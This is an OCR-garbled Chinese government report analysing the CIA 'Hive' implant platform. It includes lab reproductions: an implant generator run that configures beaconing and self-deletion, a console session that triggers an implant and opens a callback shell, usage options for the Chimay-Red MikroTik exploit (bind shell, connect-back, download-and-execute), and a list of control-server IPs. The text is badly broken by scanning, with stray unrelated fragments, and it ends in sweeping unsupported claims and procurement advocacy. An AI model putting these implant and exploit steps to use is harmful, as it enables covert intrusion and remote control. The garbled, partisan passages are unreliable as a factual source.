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应 急 中 心 任务 


美国 中 央 情 报 局 (CIA) “蜂巢 “恶意 代码 攻击 控制 武器 平台 分 析 报 告 病毒 SOS 求 救 


一 一 关于 美国 中 情 局 主 战 网 络 武器 的 预警 eS 


近日 ， 国 家 计算 机 病毒 应 急 处 理 中 心 对 "蜂巢 ”(Hive) 恶意 代码 攻击 控制 武器 平台 (UFER ERFA”) 进行 了 分 析 ， 蜂 取证 产品 
梨 平 台 由 美国 中 央 情报 局 (CIA) 数字 创新 中 心 (DDI) 下 属 的 信息 作战 中 心 工程 开发 组 (EDG， 以 下 简称 " 美 中 情 局 工程 开发 
iB") 和 美国 著名 军工 企业 诺 斯 罗 普 . 格 鲁 曼 (NOC) 旗下 XETRON 公 司 联合 研发 ， 由 美国 中 央 情报 局 (CIA) 专用 。 蜂 集 平台 属 
于 * 轻 量化 “的 网 络 武 器 ， 其 战术 目的 是 在 目标 网 络 中 建立 隐蔽 立足 点 ， 秘 密 定向 投放 恶意 代码 程序 ， 利 用 该 平台 对 多 种 恶意 代码 家 移动 互联 网 应 用 安全 管理 
程序 进行 后 台 控 制 ， 为 后 续 持 续 投 送 "重型 "武器 网 络 攻击 创造 条 件 。 美 国 中 央 情 报 局 (CIA) 运用 该 武器 平台 根据 攻击 目标 特征 中 心 
定制 适 配 多 种 操作 系统 的 恶意 代码 程序 ， 对 受害 单位 信息 系统 的 边界 路 由 器 和 内 部 主机 实施 攻击 入 侵 ， 植 入 各 类 木马 、 后 门 ， 实 

现 远程 控制 ， 对 全 球 范围 内 的 信息 系统 实施 无 差别 网 络 攻击 。 


国家 发 改 委 专项 测试 


[EH] 


一 、 技 术 分 析 
(一 ) 攻击 目标 


为 满足 美国 中 央 情 报 局 (CIA) 针对 多 平台 目标 的 攻击 需求 ， 研 发 单位 针对 不 同 CPU 架 构 和 操作 系统 分 别 开 发 了 功能 相近 的 
蜂巢 平台 适 配 版 本 。 根 据 目 前 掌握 的 情况 ， 蜂 巢 平台 可 支持 ARMv7、x86、PowerPC 和 MIPS 等 主流 CPU 架 构 ， 覆 盖 Window 
s、Unix、Linux、Solaris 等 通用 操作 系统 ， 以 及 RouterOS (一 种 由 MikroTik 公 司 开发 的 网 络 设备 专用 操作 系统 ) 等 专用 操作 
系统 。 


(二 ) 系统 构成 


蜂巢 平台 采用 C/S 架 构 ， 主 要 由 主 控 端 (hclient) 、 远 程控 制 平台 (cutthroat， 译 为 : " 割 喉 “) 、 生 成 器 (hive-patche 
r) 、 受 控 端 程序 (hived) 等 部 分 组 成 。 为 了 掩护 相关 网 络 间谍 行动 ， 美 中 情 局 工程 开发 组 还 专门 研发 了 一 套 名 为 " 蜂 房 ”(hon 
eycomb) 的 管理 系统 ， 配 合 多 层 跳板 服务 器 实现 对 大 量 遭 受 蜂巢 平台 感染 的 受害 主机 的 远程 隐蔽 控制 和 数据 归 集 。 


(三 ) 攻击 场景 复 现 


国家 计算 机 病毒 应 急 处 理 中心 深 入 分 析 蜂巢 平台 样本 的 技术 细节 ， 结 合 公开 渠道 获得 的 相关 资料 ， 基 本 完成 了 对 蜂巢 平台 典 
型 攻击 场景 的 复 现 。 
1、 利 用 生成 器 (hive-patcher) 生成 定制 化 的 受 控 端 恶意 代码 程序 


图 


中 央 情 报 局 (CIA) 攻击 人 员 首 先 根据 任务 需求 和 目标 平台 特点 ， 使 用 生成 器 (hive-patcher) 生成 待 植 入 的 定制 化 
受 控 端 恶意 代码 程序 (BÜhived) 。 在 生成 受 控 端 程序 前 ， 可 以 根据 实际 任务 需求 进行 参数 配置 (如 表 1 所 示 ) 。 


Al 生成 器 参数 

序号 “| 参数 用 途 备注 

1 -a IE TP Hir 包括 命令 控制 服务 器 或 代理 服务 器 地 址 

2 -d 延 时 启动 时 间 为 逃避 检测 ， 主 动 推 延 启动 后 的 执行 时 间 

3 i 回 联 时 间 间 隔 按 一 定时 间 间 隔 与 命令 控制 服务 器 联系 ， 以 
表示 其 仍 处 于 活跃 状态 

4 K 暗语 文件 名 保存 暗语 的 文件 名 ,暗语 不 超过 100 个 字符 

5 E: 暗语 字符 串 不 超过 100 个 字符 

6 a 变种 为 逃避 检测 , 可 生成 新 变种 , 变种 强度 可 选 ， 
从 0-30。 

kd E! 接口 仅 限 于 Solaris 系统 

8 -P 回 联 目的 端口 默认 443 

9 E EHAR TERE ARRES, BE AEN) A SRL TT 

10 4 延 时 回 联 了 唤醒 时 间 与 回 联 时 间 的 时 间 间 隔 ，+/-30 秒 

11 -m 目标 操作 系统 类 型 和 | 可 选择 Windows. MikroTik x86. 

CPU 架构 MikroTikMips. MikroTik PowerPC, Linux 

x86. Solaris x86 以 及 Solaris Sparc 等 


图 


中 央 情 报 局 (CIA) 攻击 人 员 完 成 上 述 参 数 配置 后 ， 生 成 器 (hive-patcher) 可 生成 新 的 受 控 端 植 入 体 (如 图 1 所 
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root@kali:~/Hive/clientDirectory# /hive-patcher 
ERROR: Key missing 
Usage: 


./hive-patcher -a address [-d b. delay] [-i interval] (-k idKey | -K idKeyFile) [-I interface] [-p 
port] [-t t delay] [-m OS] 


-a <address> - IP address or hostname of beacon server 
-d <b_delay> - initial delay before first beacon (in seconds), 0 for no beacons. 
-i<interva l> - beacon interval (in seconds) 


-K <idKeyFile> - ID key filename (maximum 100 character path} 
-k <ID Key Phrase> - ID key phrase (maximum 100 character string) 
-j <b _jitter> 


-I <interface> 


- beacon jitter (integer of percent variance between 0 and 30 [0-30] ) 
- Solaris Only - interface to listen for triggers 


-p <port> - (optional) beacon port [default: 443] 
-5 «sd delay - (optional) self delete delay since last successful trigger/beacon (in 
seconds) [default: 60 days] 
-t«t delay» - (optional) delay between trigger received & callback +/- 30 sec (in 
seconds) [default: 60 sec] 
-m <05> - (optional) target OS [default: 'all']. options. 
*'all' - default 
* 'raw' - all unpatched 
* win! 
* 'mt-x86' 
* 'mt-mips' 
*"mt-mipsel 
*'mt-ppc' 
* 'linux-x86' 
* 's0]-x86' 
* 'sol-sparc' 
[-h] - print this usage 


root(à)kali:--/Hive/clientDirectory? ./hive-patcher -a 192.168.241.130 -d 0 -i 30 -k "testtest" -j 0 
-m linux-x86 


This application will generate PATCHED files with the following values: 
-> 192.168.241.130 


Beacon Server Port number -> 443 


Beacon Server IP address 


Trigger Key -> 5labb9636078defbf888d8457a7c76f85c8f114¢ 
Implant Key -> 1bf3116a5372a85b80f3769f62a5162b482c00ee 
Beacon Initial Delay -> 0 (sec) 

Beacon Interval -> 30 (sec) 


Beacon Jitter 
Self Delete Delay 
Trigger Delay 


-> 0 (percentage) 
-> 5184000 (sec) 
-> 60 +/- 30 (sec) 


Target Operating Systems: 
Linux/x86 


SIG. HEAD found at offset 0003bcb4 for hived-linux-x86-PATCHED 
Generating hived-linux-x86-PATCHED file... ok 


b] 受 控 端 恶意 代码 程序 生成 器 


值得 注意 的 是 ， 从 攻击 目标 类 型 上 看 ， 美 国 中 央 情 报 局 (CIA) 特别 关注 MikroTik 系 列 网 络 设备 。MikroTik 公 司 的 网 络 路 


由 器 等 设备 在 全 球 范围 内 具有 较 高 流行 度 ， 特 别 是 其 自 研 的 RouterOS 操 作 系统 ， 被 很 多 第 三 方 路 由 器 厂商 所 采用 ， 美 国 中 央 情 
报 局 (CIA) 对 这 种 操作 系统 的 攻击 能 力 带 来 的 潜在 风险 难以 估量 。 

2、 将 服务 器 端 恶 意 代码 程序 植 入 目标 系统 

美国 中 央 情 报 局 (CIA) 特别 开发 了 一 个 名 为 "Chimay-Red” 的 MikroTik 路 由 器 漏洞 利用 工具 ， 并 编制 了 详细 的 使 用 说 明 。 


该 漏洞 利用 工具 利用 存在 于 MikroTikRouterOS 6.38.4 及 以 下 版 本 操作 系统 中 的 栈 冲突 远程 代码 执行 漏洞 ， 实 现 对 目标 系统 的 
远程 控制 。 漏 洞 利用 工具 的 使 用 说 明 如 表 2。 
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3k 2 “Chimay-Red” 漏 洞 利用 工具 使 用 说 明 


connectback 


命令 行 chimay red.py [-h] -t TARGET [-V] [-a ARCH] <command> 

序号 主要 命令 参数 。 | 说 明 

1 4 His IP 地 址 

2 N 详细 模式 ， 输 出 调试 和 错误 信息 

3 -a ARCH 指定 目标 CPU 架构 ， 包 括 mipsbe, ppc, x86, tile 
4 <command> bindshell 正 向 shell 


反 向 Shell 


download and exe 


下 载 执行 指定 可 执行 文件 


ssl download and exe 


通过 ssl 下 载 执行 指定 可 执 
行文 件 


write devel 进入 开发 者 模式 

write devel read userfile 允许 开发 者 模式 并 读 取 用 
户 文件 

custom 自 定义 Shellcode 


据 美 国政 府内 部 人 士 公 开 披露 ， 美 国 中 央 情 报 局 (CIA) 和 美国 国家 安全 局 (NSA) 同属 美国 


动 中 经 常 相互 配合 ， 美 国 国家 安全 局 的 特定 入 侵 行动 办 公 室 拥 (TAO) 拥有 " 酸 狐狸 ”(FoxAcid) 等 漏洞 攻击 武器 


网 络 攻击 工具 ， 可 以 高 效 支援 美国 中 央 情报 局 (CIA) 的 间谍 软件 植 入 行动 。 


3、 唤 醒 服务 器 端 恶意 代码 程序 并 进行 命令 控制 


服务 器 端 恶 意 代码 程序 被 植 入 目标 系统 并 正常 运行 后 ， 会 处 于 静默 潜伏 状态 ， 


加 


防 部 ， 他 们 在 对 外 网 络 战 行 


FF 台 和 系统 化 


实时 监听 受 控 信息 系统 网 络 通讯 流量 中 具有 触 


发 器 特征 的 数据 包 ， 等 待 被 “唤醒 ”。 美 国 中 央 情 报 局 (CIA) 攻击 人 员 可 以 使 用 客户 端 向 服务 器 端 发 送 "暗语 ”， 以 “唤醒 "潜伏 的 


Dj 


控 。 其 主要 命令 参数 如 表 3 所 示 。 


恶意 代码 程序 并 执行 相关 指令 。 美 国 中 央 情 报 局 (CIA) 攻击 人 员 利 用 名 为 "cutthroat (FIN) “的 控制 台 程序 对 客户 端 进行 操 


表 3“ 割 喉 ”( cutthroat ) 主要 命令 行 参 数 说 明 


Shutdown now 


Shell open 


关闭 本 地 监听 端口 ， 但 保持 植 入 体 运行 


序号 | 命令 行 说 明 

1 /cutthroat hive 进入 控制 台 

2 ilm connect «IP» eric ut o 

3 cmd exec 在 远程 主机 上 运行 指定 命令 
4 File put 从 本 地 上 传 文件 至 远程 主机 
5 File get 从 远程 主机 下 载 文件 至 本 地 
6 File delete 删除 远程 主机 上 的 指定 文件 
d 

8 


打开 一 个 新 的 加 密 Shell， 人 允许 任意 操作 


主 控 端 与 被 控 端 建立 连接 后 ， 可 以 执行 相应 控制 命令 (如 图 2 所 示 ) 。 
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root@kali:~/Hive/ctDirectory# /cutthroat hive 
mkdir: cannot create directory ../Logs/: File exists 
[success] Successfully loaded hive [load] 


CutThroat 
JY008C634-6 
Version: 2.2 
CCS Version: 2.2 


Usage: 
verbosity «level» Sets the verbosity level 
mode <new mode» Sets the operating mode of CT 


load «ILM Filename» Loads the library 
quit Exits Command Post 


>ilm connect 192.168.241.135/2E & 3E fi 
Using existing target profile. 


Listening for connection on port 443 . 


Using existing target profile. 


Trigger details: 


Callback IP address 192.168.241.130 on port 443 
Trigger key: 51abb9636078defbf888d845 7a7c 76f85c8f114c 


Trigger sent /发 送 唤醒 “暗语 ” 
„~ connection established! 
Connection details: 
Remote IP address 192.168.241.135 on port 52737 
Local IP address 192.168.241.130 on port 443 
Enabling encrypted communications://2E 3r Jo & 3E fà 43 38 
TLS handshake complete. 
AES-enerypted tunnel established. 
[Success] 
doeet Sucgegs ise /成功 建立 连接 


[ilm connect 192.168.241.135] 


[192.168.241.135]" shell open 


PARSE ERROR: 


One or more required arguments missing! 


Usage: 
shell open  <string><string><string> 


For complete Usage type: 
shell open -h 


[192.168.241.135]» shell open -h 


Initiate shell connection with remote host. 


Usage: shellopen <string><string><string> 
Where: 
<string> 

(required) Custom Attribute Callback IP address. 
<string> 

(required) Custom Attribute Callback TCP port number. 
<string> 


encryption. 


[192.168.241.135]» shell open 192.168.241.130 4444 password 
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Remote IP address 192.168.241.135 with raw-udp trigger on port 13578 


(required) Custom Attribute Password to initialize shell session 


HA Jj Jm t Shell 
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为 躲避 入 侵 检测 ， 主 控 端 通过 发 送 "暗语 "唤醒 受 控 端 恶意 代码 程序 ， 随 后 模仿 HTTP over TLS 建 立 加 密 通信 信道 ， 以 迷惑 
网 络 监测 人 员 、 规 避 技 术 监测 手段 (如 图 3 所 示 ) . 
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1  0.000000192.168.241.130 192.168.241.135 UDP 437 23744 一 13578 Len=395 


ARA 


2 0.000102 192.168.241.135 192.168.241.130 ICMP 465 Destination unreachable 


(Host administratively prohibited) 

18 60.003935 192.168.241.135 192.168.241.130 TCP74 36799 — 443 

Seq-0 Win-5840 Len-0 MSS=1460 SACK. PERM-1 TSval-32513513 TSecr-0 WS-1 
19 60.004089 192.168.241.130 192.168.241.135 TCP74 443 — 36799 


ACK] Seq-0 Ack-1 Win-28960 Len-0 MSS=1460 SACK PERM-1 T$val-27742603 


TSecr-32513513 W8-128 

20 60.004180 192.168.241.135 192.168.241.130 TCP66 36799 一 443 
Seq-1 Ack-l Win-5888 Len-0 T8val-32513513 T8eci-27742603 

21 60.004237 192.168.241.135  192.168.241.130 TLSv1.1 126 Client Hello/ 
https 

22 60.004318 192.168.241.130 192.168.241.135 TCP66 443 一 36799 
Seq-1 Ack-61 Win-29056 Len-0 TSval-27742603 TSecr=32513513 

23 60.005857 192.168.241.130 192.168.241.135  TLSvl.l 145 Server Hello 
24 60.005968 192.168.241.135 192.168.241.130 TCP66 36799 — 443 
Seq-61 Ack-80 Win-5888 Len-0 TSval-32513515 TSecr-27742603 


25 60.006060 192.168.241.130 192.168.241.135  TLSvl.l 1063 Certificate 


26 60.006169 192.168.241.135 192.168.241.130 TCP66 36799 — 443 
Seq-61 Ack-1077 Win-7936 Len-0 T$val-32513515 TSecr-27742603 

27 60.052812 192.168.241.130 192.168.241.135  TLSvl.l 596 Server 
Exchanges! $ $ 25 ik 

28 60.052951 192.168.241.135 192.168.241.130 TCP66 36799 — 443 
Seq-61 Ack=1607 Win-9856 Len=0 TSval=32513562 TSecr=27742615 


29 60.053088 192.168.241.130 192.168.241.135  TLSvl.l 75 Server Hello Done 


30 60.053143 192.168.241.135 192.168.241.130 TCP66 36799 一 443 
Seq-61 Ack-1616 Win-9856 Len-0 T$val-32513562 TSecr-27742615 

31 60.072947 192.168.241.135  192.168.241.130 TLSvl.1 205 Client 
Exchange 

32 60.112456 — 192.168.241.130 192.168.241.135 TCP66 443 — 36799 
Seq-1616 Ack-200 Win-30080 Len-0 TSval-27742630 TSecr-32513582 


33 60.112597 192.168.241.135 192.168.241.130 TLSvl.l 141 Change Cipher Spec, 


Encrypted Handshake Message 
34 60.112753 192.168.241.130 192.168.241.135 TCP66 443 — 36799 
Seq=1616 Ack=275 Win=30080 Len=0 TSval=27742630 TSecr=32513622 


35 60.112868 192.168.241.130 192.168.241.135  TLSv1.] 72 Change Cipher Spec 


36 60.152355 192.168.241.135 192.168.241.130 TCP66 36799 一 443 
Seq=275 Ack=1622 Win=9856 Len=0 TSval=32513662 TSecr=27742630 

37 60.152476 192.168.241.130 192.168.241.135 TLSv].1 135 Encrypted 
Handshake Message 

38 60.152605 192.168.241.135 192.168.241.130 TCP66 36799 — 443 
Seq=275 Ack-1691 Win=9856 Len-0 TSval=32513662 TSecr=27742640 


39 60.233037 192.168.241.130 192.168.241.135 — TLSvl.] 119 Application Data 


40 60.233199 192.168.241.135 192.168.241.130 TCP66 36799 — 443 
8eq-275 Ack-1744 Win-9856 Len-0 T$val-32513743 T8ecr-27742660 


41 60.233329 192.168.241.130 192.168.241.135 TLSvl.] 887 Application Data 


42 60.233451 192.168.241.135 192.168.241.130 TCP66 36799 — 443 
Seq-275 Ack-2565 Win-11904 Len-0 T3val-32513743 TSecr-27742660 


43 60.311981 192.168.241.135  192.168.241.130  TLSvl.l 375 Application Data 


44 60351795 192.168.241.130 192.168.241.135  TCP66 443 — 36799 
Seq-2565 Ack-584 Win-31104 Len-0 TSval-27742690 TSecr-32513821 
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28 
[SYN, 
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图 3 唤醒 并 建立 加 密 通信 


至 此 ， 主 控 端 实现 了 对 受 控 端 恶意 代码 程序 的 完全 控制 ， 可 以 在 隐蔽 状态 下 随时 投 送 其 他 恶意 负载 ， 或 开展 后 续 渗 透 窃 密 行 


为 进一步 提高 网 络 间谍 行动 的 隐蔽 性 ， 美 国 中 央 情 报 局 (CIA) 在 全 球 范围 内 精心 部 署 了 蜂巢 了 


(四 ) 掩护 措施 


F 台 相关 网 络 基础 设施 。 从 已 


经 监测 到 的 数据 分 析 ， 美 国 中 央 情 报 局 (CIA) 在 主 控 端 和 被 控 端 之 间 设 置 了 多 层 跳板 服务 器 和 VPN 通 道 ， 这 些 服务 器 广泛 分 布 


于 加 拿 大、 法 国 、 德 国 、 马 来 西亚 和 土耳其 等 国 ， 有 效 隐藏 自身 行踪 ， 受 害 者 即使 发 现 遭 受 蜂巢 平台 的 网 络 攻击 ， 也 极 难 进行 技 


术 分 析 和 追踪 溯源 。 
二 、 运 作 方式 


基于 维基 解密 公开 揭露 的 美国 中 央 情报 局 (CIA) 内 部 资料 ， 结 合 国家 计算 机 病毒 应 急 处 理 中 心 的 技术 分 析 成 果 ， 可 以 清晰 
了 解 蜂巢 平台 的 运作 方式 如 下 : 


(—) 开发 过 程 及 开发 者 
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蜂巢 平台 由 美 


国 中 央 情 报 局 (CIA) 工程 开发 组 (EDG) 牵头 研发 完成 ， 项 目 周期 至 少 从 2010 年 10 月 持续 到 2015 年 10 


月 ， 软 件 版 本 至 少 为 2.9.1， 并 且 至 少 从 2011 年 开始 就 支持 对 MikroTik 系 统 设备 及 相关 操作 系统 的 远程 攻击 。 参 与 开发 人 员 包 
括 但 不 限于 : Mike Russell, Jack McMahon, Jeremy Haas 和 Brian Timmons 等 人 (如 图 4 所 示 ) 。 


SECRET//NOFORN 
(U) For Further Assistance (U) Hive 2.6.2 User's Guide 


8 (U) For Further Assistance 


(S) For any additional assistance, please consult one of the Hive developers. As of January 2013, these 
are Mike Russell (EDG/AED/EDB), Jack McMahon (EDG/AED/EDB), Jeremy Haas (EDG/AED/EDB) 
or Brian Timmons (EDG/AED/RDB). 


4 开发 人 员 信息 


另外 ， 蜂 巢 平台 项 目 还 融入 了 合作 机 构 的 研发 成 果 ， 其 中 包括 美国 著名 军工 企业 诺 斯 罗 普 . 格 鲁 曼 (Northrop Grumma 
n) 公司 旗下 的 XETRON 公 司 编写 的 项 目 代 码 (如 图 5 所 示 ) 。 


———————— 
SArchive: SinnerTwin/] YO08C637-ILM, SDK/ClientLib/CustomCommandX.cppS 

$Revision: 18 

$Date: Tuesday, August 25, 2009 2:42:11 PMS 

SAuthor: timms 

Template: cp. file.cpp 3.0 


CPRCLASS = "PROPRIETARY LEVEL I" 
iioill 


m 
x (C) Copyright Northrop Grumman ES/ 

ax XETRON Corporation 

Gia All rights reserved 

a 

Pile  CustomCommandX - FILE DESCRIPTION | 


Implementation of the classes that model the response from the ILM interface's 
AddCommands function. 


x 


/* SNoKeywords$ (No ros replacement keywords below this point) */ 


Pho  CustomCommandX - INCLUDES ---------------------*/ 


include "CustomCommandX. hy 
&include " XMLParserStack.h" 


Bl  CustomCommandX - DECLARATIONS -------------------%/ 


using namespace InterfaceLibrary; 


using std::string, 


图 5 XETRON 公司 开发 的 功能 组 件 


XETRON 公 司 成 立 于 1972 年 ，1986 年 被 美国 西屋 电气 集团 收购 ，1996 年 与 西屋 电气 一 并 被 美国 诺 斯 罗 普 . 格 鲁 曼 公司 收 


购 ， 总 部 现 位 于 美国 俄 雍 俄 州 辛辛那提 市 郊区 ， 公 开 信 息 显 示 ， 在 2013 年 其 拥有 6.8 万 名 员工 。XETRONI 


长 期 以 来 一 直 是 美国 


中 央 情 报 局 (CIA) 的 承包 商 ， 其 产品 范围 包括 军用 传感器 、 通 信 系统 和 网 络 安全 软件 等 。 据 维基 解密 揭露 的 资料 ，XETRON 公 
司 除 参与 蜂巢 平台 项 目 外 ， 还 向 美国 中 央 情 报 局 (CIA) 提供 了 入 侵 思科 (Cisco) 路 由 器 的 工具 "Cinnamon”。 另 据 诺 斯 罗 普 
XETRON 致 力 于 为 政府 客户 的 行动 提供 技术 支持 ， 并 且 专 注 于 "计算 机 网 络 行动 "， 优 势 技术 包括 : 加 密 、 入 侵 
检测 、 逆 向 工程 和 渗透 攻击 。XETRON 长 期 以 来 一 直 从 辛辛那提 大 学 和 戴 顿 大 学 招 录 网 络 安全 人 才 。 


格 鲁 曼 公 司 描述 ， 


(二 ) 蜂巢 平台 网 络 基础 设施 


在 " 蜂 房 ”(honeycomb) 中 的 脚本 中 ， 研 究 人 员 发 现 了 一 批 曾经 被 美国 中 央 情 报 局 (CIA) 用 于 控制 蜂巢 平台 受 控 端 恶意 
代码 程序 的 服务 器 IP 地 址 (如 表 4 所 示 ) 。 服 务 器 所 在 地 区 覆盖 欧洲 、 美 洲 和 亚洲 (如 图 6 所 示 ) . 
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A 蜂 集 平台 控制 服务 器 信息 


序号 内 网 地 址 外 网 地 址 所 在 地 

1 10.177.76.14 82.221.131.100 Kk 

2 10.177.76.18 78.138.97.145 法 国 斯 特 拉 斯 保 
3 10.177.76.22 192.99.0.128 加 拿 大 魁 北 京 
4 10.177.76.26 201.218.252.110 巴拿马 

5 10.177.76.30 186.193.44.130 巴西 

6 10.177.77.34 190.120.236.211 巴西 

7 10.177.77.38 193.34.145.82 德国 巴伐利亚 

8 10.177.77.42 31.210.100.208 土耳其 伊斯坦布尔 
9 10.177.77.46 103.8.24 143 马来西亚 吉隆 坡 
10 10.177.77.50 46.108.130.10 德国 


#retrieve all BeaconData 
beaconData = dom getElementsBy TagName( ToolHandlerFile^[0] toxml() 


for line in beaconData.split(^a) 
if '<IP>' in line 

oldIp = preProcessingResults['bb IP'] 
nlp = preProcessingResultsi'vps IP'] 
if nip ——10.177.76.14': 

nlp = '82.221.131.100' 
elifaIp == '10.177.76.18" 

nlp —'78.138.97.145' 
elifnIp == '10.177.76.22" 

nIp —'192.99.0.128' 
elifnIp == '10.177.76.26" 

nip = 201.218.252.110* 
elifaIp == '10.177.76.30* 

nlp = '186.193.44.130' 
elifnIp == '10.177.77.34' 

mIp ='190.120.236.21 1' 
elifnIp == '10.177.77.38" 

nip = 193.34.145.82 
elifnIp == '10.177.77.42^ 

nlp = '31.210.100.208' 
elifalp == '10.177.77.46" 

nlp —-'103.8.24.143' 
elifnlp == '10.177.77.50" 

nIp = 46.108.130.10 
ipLine = line.replace( oldIp, nIp) 


liprint ipLine 
outfile write(ipLinet^n^) 


elif '<addressString' in line and preProcessingResults['newIP"] (= None: 
#print "In addressString, line-" + line 
oldvps = preProcessingResults['vps IP'] 
Sprint "Old addressString =" + oldvps 
newip = preProcessingResulis|'newIP'] 
diprint "New addressString = " + newip 
newLine = line.replace( oldvps, newip) 
fiprint "New addressString line-" + newLine 
outfile.write(newLine*^n') 


else: 


outfile.write(line+"n') 


outfile.close 


command="/bin/rm " + inputFile 


à command-" /bin/mv "+ inputFile + " orig beacons/" 
Li 
# print command 


os.system(command) 


R 


图 6 蜂 集 平台 网 络 基础 设施 
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上 述 分 析 表 明 ， 美 国 中 央 情 报 局 (CIA) 对 他 国 发 动 网 络 黑客 攻击 的 武器 系统 已 经 实现 体系 化 、 规 模 化 、 无 痕 化 和 人 工 智能 
化 。 其 中 ， 蜂 巢 平台 作为 CIA 攻 击 武器 中 的 "先锋 官 " 和 "突击 队 “， 承 担 了 突破 目标 防线 的 重要 职能 ， 其 广泛 的 适应 性 和 强大 的 突 
防 能 力 向 全 球 互联 网 用 户 发 出 了 重大 警告 。 


(—) 美国 中 央 情 报 局 (CIA) 拥有 强大 而 完备 的 网 络 攻击 武器 库 


蜂巢 平台 作为 美国 中 央 情 报 局 (CIA) 的 主 战 网 络 武器 装备 之 一 ， 其 强大 的 系统 功能 、 先 进 的 设计 理念 和 超前 的 作战 思想 充 
分 体现 了 CIA 在 网 络 攻击 领域 的 突出 能 力 。 其 网 络 武器 涵盖 远程 扫描 、 漏 洞 利用 、 隐 蔽 植 入 、 嗅 探 窃 密 、 文 件 提取 、 内 网 渗透 、 
系统 破坏 等 网 络 攻击 活动 的 全 链条 ， 具 备 统一 指挥 操控 能 力 ， 已 基本 实现 人 工 智 能 化 。 美 国 中 央 情 报 局 (CIA) 依托 蜂巢 平台 建 
立 的 覆盖 全 球 互联 网 的 间谍 情报 系统 ， 正 在 对 世界 各 地 的 高 价值 目标 和 社会 名 流 实施 无 差别 的 网 络 监听 。 


(Z) 美国 中 央 情 报 局 (CIA) 对 全 球 范围 的 高 价值 目标 实施 无 差别 的 攻击 控制 和 通讯 窃 密 


国 中 央 情 报 局 的 黑客 攻击 和 网 络 间谍 活动 目标 涉及 俄罗斯 、 伊 朗 、 中 国 、 日 本 、 韩 国 等 世界 各 国政 府 、 政 党 、 非 政府 组 
织 、 国 际 组 织 和 重要 军事 目标 ， 各 国政 要 、 公 众人 物 、 社 会 名 人 和 技术 专家 ， 教 育 、 科 研 、 通 讯 、 医 疗 机 构 ， 大 量 窃取 受害 国 的 
秘密 信息 ， 大 量 获取 受害 国 重要 信息 基础 设施 的 控制 权 ， 大 量 掌握 世界 各 国 的 公民 个 人 隐私 ， 服 务 于 美国 维持 霸权 地 位 。 


(=) 全 球 互联 网 和 世界 各 地 的 重要 信息 基础 设施 已 经 成 为 美国 情 治 部 门 的 "情报 站 ” 


从 近期 中 国 网 络 安全 机 构 揭露 的 美国 国家 安全 局 (NSA) “ 电 幕 行动 “APT-C-40“^“NOPEN“ "量子 “网 络 攻击 武器 和 此 次 曝光 
的 美国 中 央 情 报 局 (CIA) “蜂巢 “武器 平台 的 技术 细节 分 析 ， 现 有 国际 互联 网 的 骨干 网 设备 和 世界 各 地 的 重要 信息 ， 基 础 设施 中 
(服务 器 、 交 换 设备 、 传 输 设备 和 上 网 终端 ) ， 只 要 包含 美国 互联 网 公司 提供 的 硬件 、 操 作 系统 和 应 用 软件 ， 就 极 有 可 能 包含 零 
A (Oday) 或 各 类 后 门 程序 (Backdoor) ， 就 极 有 可 能 成 为 美国 情 治 机 构 的 攻击 窃 密 目标 ， 全 球 互联 网 上 的 全 部 活动 、 存 储 
的 全 部 数据 都 会 "如 实 “ 展 现在 美国 情 治 机 构 面前 ， 成 为 其 对 全 球 目标 实施 攻击 破坏 的 "把 柄 “和 "素材 “。 


(四 ) 情 治 部 门 的 网 络 攻击 武器 已 经 实现 人 工 智能 化 


图 


图 


蜂巢 平台 典型 的 美国 军工 产品 ， 模 块 化 、 标 准 化 程度 高 ， 扩 展 性 好 ， 表 了 明美 国 已 实现 网 络 武器 的 " 产 学 研一 体 化 “。 这 些 武器 
[根据 目标 网 络 的 硬件 、 软 件 配置 和 存在 后 门 、 漏 洞 情况 自动 发 起 网 络 攻击 ， 并 依托 人 工 智能 技术 自动 提高 权限 、 自 动 窃 密 、 自 
动 隐藏 痕迹 、 自 动 回 传 数据 ， 实 现 对 攻击 目标 的 全 自动 控制 。 


国家 计算 机 病毒 应 急 处 理 中 心 提醒 广大 互联 网 用 户 ， 美 国情 治 部 门 的 网 络 攻击 是 迫在眉睫 的 现实 威胁 ， 针 对 带 有 美国 " 基 
“的 计算 机 软 硬 设备 的 攻击 窃 密 如 影 随 形 。 避 免 遭 受 美国 黑客 攻击 的 权宜 之 计 是 采用 自主 可 控 的 国产 化 设备 。 


a| 


图 


b] 


e Technical Analysis on HIVE 
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